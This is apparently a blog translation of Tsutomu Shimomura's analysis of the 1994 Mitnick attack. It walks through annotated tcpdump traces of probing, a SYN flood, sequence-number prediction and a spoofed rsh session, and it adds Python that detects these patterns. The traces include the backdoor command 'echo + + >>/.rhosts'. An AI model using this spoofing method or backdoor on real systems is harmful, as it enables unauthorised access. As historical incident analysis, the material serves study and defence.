
Jumat, 11 November 2011

How Mitnick carried out the IP sequence attack

John Markoff's article in the 1/23/95 NYT and CERT advisory CA-95:01 both mention IP address spoofing (IP spoofing) and hijacking attacks at some length. Here is some of my technical material on it. I hope it helps you understand how this kind of attack actually works.

These are two quite distinct attack techniques. IP source address spoofing and TCP sequence number prediction were used to gain initial access to a diskless workstation being used as an X terminal. Once root access had been obtained, an existing connection to another system was hijacked by means of a "loadable kernel STREAMS module".

The packet records of this attack were all captured with tcpdump. The relevant part is quite clear (and short!); some timestamps have been omitted. I particularly recommend Steve Bellovin's article on "IP spoofing": it describes the TCP handshake in great detail and also explains how to block this kind of attack.

My setup was as follows:

server = a SPARC workstation running Solaris 1 that provides the "X terminal" service
x-terminal = a system running Solaris 1 that provides the "X terminal" service
target = the apparent target of the attack


The IP spoofing attack began at 14:09:32 PST on 12/25/94. The first probes came from toad.com (from the packet records):

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server
14:10:50 toad.com# finger -l root@server
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal

These probes were meant to find out what trust relationships existed among these systems, so that an IP spoofing attack could then be launched. The source ports used by showmount and rpcinfo show that they were run as root on toad.com.

About six minutes later we received a flood of TCP SYNs (connection requests) from 130.92.6.97 to port 513 (login) on server. The purpose of these SYNs was to fill the connection queue of port 513 with half-open connections, so that it could no longer accept any new connection requests. More specifically, it would then not send a TCP RST in response to any unexpected SYN-ACK.

[梦: on this point, see the TCP three-way handshake]

Port 513 is a "privileged" port (< IPPORT_RESERVED), so server.login can safely be used as the assumed source address for an address-spoofing attack on the UNIX "r-services" (rsh, rlogin):

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096

server generates SYN-ACKs for the first 8 SYN requests, while its queue is not yet full. It then keeps retransmitting these SYN-ACKs, but no ACK for them ever comes back.

We now see 20 connection requests from apollo.it.luc.edu to x-terminal.shell. Their purpose is to observe how x-terminal's TCP sequence numbers advance. The initial sequence numbers increase by one with each connection, which means these SYN packets were not generated by the system's own TCP implementation. As a result an RST is generated for each unexpected SYN-ACK, so the queue on x-terminal does not fill up:

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0

Note that each SYN-ACK sent by x-terminal carries an initial sequence number chosen by x-terminal, and each one is larger than the one before it (compare the consecutive SYN-ACKs above).

We now see a forged SYN (connection request), purportedly from server.login, sent to x-terminal.shell. The assumption is that server is trusted by x-terminal, so x-terminal will honour requests from server (or from anything masquerading as server).

x-terminal replies to server with a SYN-ACK, and the connection is only opened once that SYN-ACK has been ACKed. Because server is dropping the packets delivered to server.login, the ACK has to be forged as well.

Normally the sequence number from the SYN-ACK is needed to generate a valid ACK. Even so, the attacker can predict the sequence number carried in the SYN-ACK from the known behaviour of x-terminal's TCP sequence number generator, and so can send the ACK below for a SYN-ACK that was never seen:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
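As an added example (not part of Shimomura's original post or of this translation), the following Python parses the tcpdump lines quoted above and applies two checks a defender would want on such a capture: it flags the half-open SYN flood against server.login described earlier, and it measures the stride of x-terminal's SYN-ACK initial sequence numbers and confirms that the forged ACK number 2024384001 is exactly the next predicted ISN plus one, which is why x-terminal accepted it. The host names and sample lines are taken from the trace on this page; the function names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Subset of the tcpdump trace quoted on this page (the page's own data, not
# constructed): three flood SYNs against server.login, four of the twenty ISN
# probes against x-terminal.shell, and the spoofed SYN / ACK pair.
TRACE = """\
14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) > (?P<dst>\S+): (?P<flags>[SRFP.]+) "
    r"(?:(?P<seq>\d+):\d+\(\d+\) )?(?:ack (?P<ack>\d+) )?win \d+$"
)


@dataclass
class Segment:
    ts: str
    src: str   # "host.port", e.g. "130.92.6.97.600" or "server.login"
    dst: str
    flags: str
    seq: Optional[int]   # sequence number of a SYN/RST/data segment
    ack: Optional[int]   # acknowledgement number, if the ACK flag was set

    def src_host(self) -> str:
        return self.src.rsplit(".", 1)[0]

    def dst_host(self) -> str:
        return self.dst.rsplit(".", 1)[0]


def parse_trace(text: str) -> List[Segment]:
    """Parse old-style tcpdump TCP summary lines; non-matching lines are skipped."""
    segs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            segs.append(Segment(m["ts"], m["src"], m["dst"], m["flags"],
                                int(m["seq"]) if m["seq"] else None,
                                int(m["ack"]) if m["ack"] else None))
    return segs


def half_open_flooders(segs: List[Segment], threshold: int) -> List[str]:
    """Hosts that sent >= threshold bare SYNs to one service and never ACKed
    or RST'd any of them: the half-open pattern used to silence server.login.
    apollo's probes RST their SYN-ACKs, so they are not flagged."""
    syns = Counter()
    finished = set()
    for s in segs:
        key = (s.src_host(), s.dst)
        if s.flags == "S" and s.ack is None:
            syns[key] += 1
        elif s.flags in ("R", "."):
            finished.add(key)
    return sorted(f"{h} -> {d}" for (h, d), n in syns.items()
                  if n >= threshold and (h, d) not in finished)


def isn_stride(segs: List[Segment], host: str) -> Optional[int]:
    """Smallest increment between successive SYN-ACK ISNs issued by host when
    every increment is a multiple of it (a constant-step generator, allowing
    for uncaptured connections in between); None if the ISNs look random."""
    isns = [s.seq for s in segs
            if s.flags == "S" and s.ack is not None and s.src_host() == host]
    deltas = [b - a for a, b in zip(isns, isns[1:])]
    if len(deltas) < 2 or min(deltas) <= 0:
        return None
    step = min(deltas)
    return step if all(d % step == 0 for d in deltas) else None


def check_spoofed_ack(segs: List[Segment], victim: str, spoofed: str) -> dict:
    """With a constant-step generator the next SYN-ACK carries last_isn + step,
    and a valid ACK acknowledges that ISN + 1; 'predictable' is True when the
    plain ACK sent in the victim's name matches exactly that."""
    step = isn_stride(segs, victim)
    last = max((s.seq for s in segs if s.flags == "S" and s.ack is not None
                and s.src_host() == victim), default=0)
    acks = [s.ack for s in segs if s.flags == "." and s.ack is not None
            and s.src_host() == spoofed and s.dst_host() == victim]
    predicted = last + step if step is not None else None
    return {"step": step, "predicted_isn": predicted,
            "observed_ack": acks[0] if acks else None,
            "predictable": bool(acks) and predicted is not None
                           and acks[0] == predicted + 1}
```

On a full capture the threshold for half_open_flooders should be set well above three; it is low here only because the embedded sample keeps three of the thirty flood SYNs.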

The spoofing machine now has a connection to x-terminal.shell that appears to come from server.login. It can keep the connection up and send data as long as it ACKs everything correctly. That looks like this:

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096

which corresponds to:

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"

Total time elapsed since the first spoofed packet: < 16 seconds. The spoofed connection is then torn down:

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096

We now see RSTs freeing the half-open, empty connections in the server.login queue:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096

server.login can now accept connection requests again.

After root access had been obtained through the IP spoofing attack, a kernel module called "tap-2.01" was compiled and installed on x-terminal:

x-terminal% modstat
Id Type Loadaddr Size B-major C-major Sysnum Mod Name
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha

x-terminal% ls -l /dev/tap
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap

This is a kernel STREAMS module that can be pushed onto an existing STREAMS stack to take control of the user sitting on that tty device.
